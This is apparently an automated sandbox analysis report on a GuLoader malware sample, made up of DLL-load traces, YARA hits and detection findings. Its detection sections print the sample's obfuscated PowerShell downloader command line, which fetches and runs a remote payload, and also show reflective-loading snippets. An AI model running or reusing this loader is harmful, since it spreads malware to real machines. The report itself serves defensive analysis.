Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: vaultcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FTSKIaM\FTSKIaM.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FTSKIaM\FTSKIaM.exe	Section loaded: cryptdlg.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FTSKIaM\FTSKIaM.exe	Section loaded: msoert2.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FTSKIaM\FTSKIaM.exe	Section loaded: msimg32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FTSKIaM\FTSKIaM.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FTSKIaM\FTSKIaM.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FTSKIaM\FTSKIaM.exe	Section loaded: cryptui.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FTSKIaM\FTSKIaM.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FTSKIaM\FTSKIaM.exe	Section loaded: msftedit.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FTSKIaM\FTSKIaM.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FTSKIaM\FTSKIaM.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FTSKIaM\FTSKIaM.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FTSKIaM\FTSKIaM.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FTSKIaM\FTSKIaM.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FTSKIaM\FTSKIaM.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FTSKIaM\FTSKIaM.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FTSKIaM\FTSKIaM.exe	Section loaded: explorerframe.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FTSKIaM\FTSKIaM.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FTSKIaM\FTSKIaM.exe	Section loaded: actxprxy.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FTSKIaM\FTSKIaM.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FTSKIaM\FTSKIaM.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FTSKIaM\FTSKIaM.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FTSKIaM\FTSKIaM.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FTSKIaM\FTSKIaM.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FTSKIaM\FTSKIaM.exe	Section loaded: cryptdlg.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FTSKIaM\FTSKIaM.exe	Section loaded: msoert2.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FTSKIaM\FTSKIaM.exe	Section loaded: msimg32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FTSKIaM\FTSKIaM.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FTSKIaM\FTSKIaM.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FTSKIaM\FTSKIaM.exe	Section loaded: cryptui.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FTSKIaM\FTSKIaM.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FTSKIaM\FTSKIaM.exe	Section loaded: msftedit.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FTSKIaM\FTSKIaM.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FTSKIaM\FTSKIaM.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FTSKIaM\FTSKIaM.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FTSKIaM\FTSKIaM.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FTSKIaM\FTSKIaM.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FTSKIaM\FTSKIaM.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FTSKIaM\FTSKIaM.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FTSKIaM\FTSKIaM.exe	Section loaded: explorerframe.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FTSKIaM\FTSKIaM.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FTSKIaM\FTSKIaM.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FTSKIaM\FTSKIaM.exe	Section loaded: iertutil.dll	Jump to behavior

Source: C:\Windows\System32\wscript.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32

Jump to behavior

Source: C:\Users\user\AppData\Roaming\FTSKIaM\FTSKIaM.exe

File opened: C:\Windows\SysWOW64\msftedit.dll

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Jump to behavior

Source:	Binary string: System.Management.Automation.pdb source: powershell.exe, 00000009.00000002.2003573234.00000000008A1000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 00000009.00000002.2010781616.0000000006F36000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000009.00000002.2010781616.0000000006F85000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wab.pdbGCTL source: FTSKIaM.exe, 00000013.00000000.2378354849.0000000000A11000.00000020.00000001.01000000.00000008.sdmp
Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb source: powershell.exe, 00000009.00000002.2003573234.0000000000904000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: stem.Core.pdbS source: powershell.exe, 00000009.00000002.2010781616.0000000006F85000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wab.pdb source: FTSKIaM.exe, FTSKIaM.exe, 00000013.00000000.2378354849.0000000000A11000.00000020.00000001.01000000.00000008.sdmp

Data Obfuscation

VBScript performs obfuscated calls to suspicious functions

Source: C:\Windows\System32\wscript.exe

Anti Malware Scan Interface: ShellExecute("POWERSHELL.exe", ""$Overburdeningly = 1;$Haarrddernes='Su", "", "", "0");

Yara detected GuLoader

Source: Yara match	File source: 00000009.00000002.2016300220.000000000951A000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2679929733.000000000438A000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2007966903.0000000005714000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2016128016.0000000008250000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.2224520722.000001F09AC40000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Found suspicious powershell code related to unpacking or dynamic code loading

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Anti Malware Scan Interface: FromBase64String($Tavlemesters)$global:Ambulatorierne = [System.Text.Encoding]::ASCII.GetString($Hjemvisning)$global:Reddedes=$Ambulatorierne.substring(290804,28156)<#Cachexias Mumiernes Kommaregler #
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Anti Malware Scan Interface: GetDelegateForFunctionPointer((Reaffirmations $Overherrernes $Skamrider242), (Supervise @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Tritheistical = [AppDomain]::CurrentDomain.GetAsse
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Anti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Stemmesamlerens197)), [System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule($gulravage, $false).DefineType($Udplynd
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Anti Malware Scan Interface: FromBase64String($Tavlemesters)$global:Ambulatorierne = [System.Text.Encoding]::ASCII.GetString($Hjemvisning)$global:Reddedes=$Ambulatorierne.substring(290804,28156)<#Cachexias Mumiernes Kommaregler #

Suspicious powershell command line found

Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Overburdeningly = 1;$Haarrddernes='Substrin';$Haarrddernes+='g';Function Blomraadne($Suggestionen){$Kulsyre=$Suggestionen.Length-$Overburdeningly;For($Esrogs=5; $Esrogs -lt $Kulsyre; $Esrogs+=(6)){$Bilendes+=$Suggestionen.$Haarrddernes.Invoke($Esrogs, $Overburdeningly);}$Bilendes;}function Uudviklet($Sammenstuvningerne){. ($Subpellucidity) ($Sammenstuvningerne);}$Dulmes=Blomraadne 'Cha,tMRanchoBlomszCenteizonkmlUfejll halaa ,ump/ epos5.udek.duske0Delet Nonad(KvindW .elgiPrecinTrossd.kkupoUdv.kwSammesvalgb MeroNFili,TTo.ea R gar1Midta0Sildd.Ingra0d.ast;Udann .ordbW Pakki Twenn .ewy6Aands4 Flor;F tal Ori,ax Syst6A.ted4In us;Moloi Henler Ragiv Tupp:Trspr1Corne2,ehir1Pyrox.Fr sk0Misoc)Torke Ekko.G KnoweAfgifcHillekHydrooS.eln/Tabul2Optje0Sylte1 er t0 klyn0Endit1Warm,0commi1Glott SubinFHaardiMicror lipoeSpi nfDoledoVegetxphyti/Bjerg1.ntif2Chilt1Supre.Medbo0Uarb, ';$subdichotomies=Blomraadne 'Fraa.U AnfrsDr,meesoegmrLokal-AlgebATid bgomd sePr ctn UnmatKalpa ';$Rugemaskine=Blomraadne 'Brillh A lht .rogtOrchepNeedlsMedik:strib/Parel/ F icdomstbrOpiliiConcevAuriceSteps.,mertgSkydeoTyskeoDer,ig,aterlMassee Mani.Imparc Sibio E.evm.rogr/LatteuGermacAtmos?Gera,e RektxCnemipSommeoFuldvrCentrtOplad=Lepadd KoldoS delwStiplnArchblFrassoantipaCathodunder&Ph soiUnbo d P.rt= k al1depoloMys.aDDyref4RevistAgricvPrissDGua adAdipoyRever2Plump-Maskir,ddanKHartvBAtticIUoplarSpiroZStri.pPlackCId tsyrec p_UnbroNS.endR Sm.aSKar oRAssis7 ThyrV erdiMVrimltAndenGSjleh_Gl.bulForetyrehee ';$kattelemmes=Blomraadne 'Trf,e>Unr,c ';$Subpellucidity=Blomraadne ' DispiEmbele Mergx enne ';$Aluminate = Blomraadne ' atrieCatarc,laedhInd.boSiph, Rustn%t.ndra.espep,alaapFals,dAnimaaan istD.liraHygie%Br.ne\Misg STaf,faNoni.lR.nsktRneres Blanp HiemoTotaloUddatnAtt,sfEkspouVe.erl .oth.UnderD toldaPanteg,ndos nejp& Mand&Amazi shareeA.delcLegalh BagloMurha For.$Parke ';Uudviklet (Blomraadne 'Syge.$ HavegHaandlGe.peo PaabbKdedea nshelForka:BrndsT,orgei absulDeltrhA inauAp degBodywgSlethe NrklnPrikkd Op.seMegal=Dread(V,melcCrescmDurwaddiffu Sickl/,rgancL rdo Kant.$KorreARingdlStnd u W,gomNon ei.redinlun.eaUnwort Brn.e baga)Brynj ');Uudviklet (Blomraadne 'O.ert$BrudegBedralNig,roNonprbbiosyaAtomil Mail:BattlLMi.iseVictua kisknA.tioeRen.rr Adve=Li sf$emnetRpastouOmf,vgHypere Jo.om nnuea Embes TalmkResmiiLing.n UvureAfled.MystisTrevlpfightlKlokkiTheomtBom,e(Bowpo$Exp.lk ladfaEmanatph not P toeSvngnl,araneHackemGibbim,andieRai ls cere)Wrath ');$Rugemaskine=$Leaner[0];Uudviklet (Blomraadne ' Trof$ PringScrewl etouoAmidobfi.eraBlgfrlTaste: lanhshrineCanonnSupersmetapiEskaddPostidPlagieR,klarRke,a=S.mmeN AucdeH.drowVagts-MervrO FilibV,rmojPejlke usikc Ins,tSepar SkyttSPhytoySldehsFasantBreake Staam udls. Su iNIs pae udaet Mahd.juncoW B steUnendb,utotC gla lIndkoiMisadeDagdrnCountt Cul. ');Uudviklet (Blomraadne ' mari$FejlbhArbejeDiffen.uppesRegnei PassdFlatmdPip.ieLunker Cyli. ,nf
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Overburdeningly = 1;$Haarrddernes='Substrin';$Haarrddernes+='g';Function Blomraadne($Suggestionen){$Kulsyre=$Suggestionen.Length-$Overburdeningly;For($Esrogs=5; $Esrogs -lt $Kulsyre; $Esrogs+=(6)){$Bilendes+=$Suggestionen.$Haarrddernes.Invoke($Esrogs, $Overburdeningly);}$Bilendes;}function Uudviklet($Sammenstuvningerne){. ($Subpellucidity) ($Sammenstuvningerne);}$Dulmes=Blomraadne 'Cha,tMRanchoBlomszCenteizonkmlUfejll halaa ,ump/ epos5.udek.duske0Delet Nonad(KvindW .elgiPrecinTrossd.kkupoUdv.kwSammesvalgb MeroNFili,TTo.ea R gar1Midta0Sildd.Ingra0d.ast;Udann .ordbW Pakki Twenn .ewy6Aands4 Flor;F tal Ori,ax Syst6A.ted4In us;Moloi Henler Ragiv Tupp:Trspr1Corne2,ehir1Pyrox.Fr sk0Misoc)Torke Ekko.G KnoweAfgifcHillekHydrooS.eln/Tabul2Optje0Sylte1 er t0 klyn0Endit1Warm,0commi1Glott SubinFHaardiMicror lipoeSpi nfDoledoVegetxphyti/Bjerg1.ntif2Chilt1Supre.Medbo0Uarb, ';$subdichotomies=Blomraadne 'Fraa.U AnfrsDr,meesoegmrLokal-AlgebATid bgomd sePr ctn UnmatKalpa ';$Rugemaskine=Blomraadne 'Brillh A lht .rogtOrchepNeedlsMedik:strib/Parel/ F icdomstbrOpiliiConcevAuriceSteps.,mertgSkydeoTyskeoDer,ig,aterlMassee Mani.Imparc Sibio E.evm.rogr/LatteuGermacAtmos?Gera,e RektxCnemipSommeoFuldvrCentrtOplad=Lepadd KoldoS delwStiplnArchblFrassoantipaCathodunder&Ph soiUnbo d P.rt= k al1depoloMys.aDDyref4RevistAgricvPrissDGua adAdipoyRever2Plump-Maskir,ddanKHartvBAtticIUoplarSpiroZStri.pPlackCId tsyrec p_UnbroNS.endR Sm.aSKar oRAssis7 ThyrV erdiMVrimltAndenGSjleh_Gl.bulForetyrehee ';$kattelemmes=Blomraadne 'Trf,e>Unr,c ';$Subpellucidity=Blomraadne ' DispiEmbele Mergx enne ';$Aluminate = Blomraadne ' atrieCatarc,laedhInd.boSiph, Rustn%t.ndra.espep,alaapFals,dAnimaaan istD.liraHygie%Br.ne\Misg STaf,faNoni.lR.nsktRneres Blanp HiemoTotaloUddatnAtt,sfEkspouVe.erl .oth.UnderD toldaPanteg,ndos nejp& Mand&Amazi shareeA.delcLegalh BagloMurha For.$Parke ';Uudviklet (Blomraadne 'Syge.$ HavegHaandlGe.peo PaabbKdedea nshelForka:BrndsT,orgei absulDeltrhA inauAp degBodywgSlethe NrklnPrikkd Op.seMegal=Dread(V,melcCrescmDurwaddiffu Sickl/,rgancL rdo Kant.$KorreARingdlStnd u W,gomNon ei.redinlun.eaUnwort Brn.e baga)Brynj ');Uudviklet (Blomraadne 'O.ert$BrudegBedralNig,roNonprbbiosyaAtomil Mail:BattlLMi.iseVictua kisknA.tioeRen.rr Adve=Li sf$emnetRpastouOmf,vgHypere Jo.om nnuea Embes TalmkResmiiLing.n UvureAfled.MystisTrevlpfightlKlokkiTheomtBom,e(Bowpo$Exp.lk ladfaEmanatph not P toeSvngnl,araneHackemGibbim,andieRai ls cere)Wrath ');$Rugemaskine=$Leaner[0];Uudviklet (Blomraadne ' Trof$ PringScrewl etouoAmidobfi.eraBlgfrlTaste: lanhshrineCanonnSupersmetapiEskaddPostidPlagieR,klarRke,a=S.mmeN AucdeH.drowVagts-MervrO FilibV,rmojPejlke usikc Ins,tSepar SkyttSPhytoySldehsFasantBreake Staam udls. Su iNIs pae udaet Mahd.juncoW B steUnendb,utotC gla lIndkoiMisadeDagdrnCountt Cul. ');Uudviklet (Blomraadne ' mari$FejlbhArbejeDiffen.uppesRegnei PassdFlatmdPip.ieLunker Cyli. ,nf
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Overburdeningly = 1;$Haarrddernes='Substrin';$Haarrddernes+='g';Function Blomraadne($Suggestionen){$Kulsyre=$Suggestionen.Length-$Overburdeningly;For($Esrogs=5; $Esrogs -lt $Kulsyre; $Esrogs+=(6)){$Bilendes+=$Suggestionen.$Haarrddernes.Invoke($Esrogs, $Overburdeningly);}$Bilendes;}function Uudviklet($Sammenstuvningerne){. ($Subpellucidity) ($Sammenstuvningerne);}$Dulmes=Blomraadne 'Cha,tMRanchoBlomszCenteizonkmlUfejll halaa ,ump/ epos5.udek.duske0Delet Nonad(KvindW .elgiPrecinTrossd.kkupoUdv.kwSammesvalgb MeroNFili,TTo.ea R gar1Midta0Sildd.Ingra0d.ast;Udann .ordbW Pakki Twenn .ewy6Aands4 Flor;F tal Ori,ax Syst6A.ted4In us;Moloi Henler Ragiv Tupp:Trspr1Corne2,ehir1Pyrox.Fr sk0Misoc)Torke Ekko.G KnoweAfgifcHillekHydrooS.eln/Tabul2Optje0Sylte1 er t0 klyn0Endit1Warm,0commi1Glott SubinFHaardiMicror lipoeSpi nfDoledoVegetxphyti/Bjerg1.ntif2Chilt1Supre.Medbo0Uarb, ';$subdichotomies=Blomraadne 'Fraa.U AnfrsDr,meesoegmrLokal-AlgebATid bgomd sePr ctn UnmatKalpa ';$Rugemaskine=Blomraadne 'Brillh A lht .rogtOrchepNeedlsMedik:strib/Parel/ F icdomstbrOpiliiConcevAuriceSteps.,mertgSkydeoTyskeoDer,ig,aterlMassee Mani.Imparc Sibio E.evm.rogr/LatteuGermacAtmos?Gera,e RektxCnemipSommeoFuldvrCentrtOplad=Lepadd KoldoS delwStiplnArchblFrassoantipaCathodunder&Ph soiUnbo d P.rt= k al1depoloMys.aDDyref4RevistAgricvPrissDGua adAdipoyRever2Plump-Maskir,ddanKHartvBAtticIUoplarSpiroZStri.pPlackCId tsyrec p_UnbroNS.endR Sm.aSKar oRAssis7 ThyrV erdiMVrimltAndenGSjleh_Gl.bulForetyrehee ';$kattelemmes=Blomraadne 'Trf,e>Unr,c ';$Subpellucidity=Blomraadne ' DispiEmbele Mergx enne ';$Aluminate = Blomraadne ' atrieCatarc,laedhInd.boSiph, Rustn%t.ndra.espep,alaapFals,dAnimaaan istD.liraHygie%Br.ne\Misg STaf,faNoni.lR.nsktRneres Blanp HiemoTotaloUddatnAtt,sfEkspouVe.erl .oth.UnderD toldaPanteg,ndos nejp& Mand&Amazi shareeA.delcLegalh BagloMurha For.$Parke ';Uudviklet (Blomraadne 'Syge.$ HavegHaandlGe.peo PaabbKdedea nshelForka:BrndsT,orgei absulDeltrhA inauAp degBodywgSlethe NrklnPrikkd Op.seMegal=Dread(V,melcCrescmDurwaddiffu Sickl/,rgancL rdo Kant.$KorreARingdlStnd u W,gomNon ei.redinlun.eaUnwort Brn.e baga)Brynj ');Uudviklet (Blomraadne 'O.ert$BrudegBedralNig,roNonprbbiosyaAtomil Mail:BattlLMi.iseVictua kisknA.tioeRen.rr Adve=Li sf$emnetRpastouOmf,vgHypere Jo.om nnuea Embes TalmkResmiiLing.n UvureAfled.MystisTrevlpfightlKlokkiTheomtBom,e(Bowpo$Exp.lk ladfaEmanatph not P toeSvngnl,araneHackemGibbim,andieRai ls cere)Wrath ');$Rugemaskine=$Leaner[0];Uudviklet (Blomraadne ' Trof$ PringScrewl etouoAmidobfi.eraBlgfrlTaste: 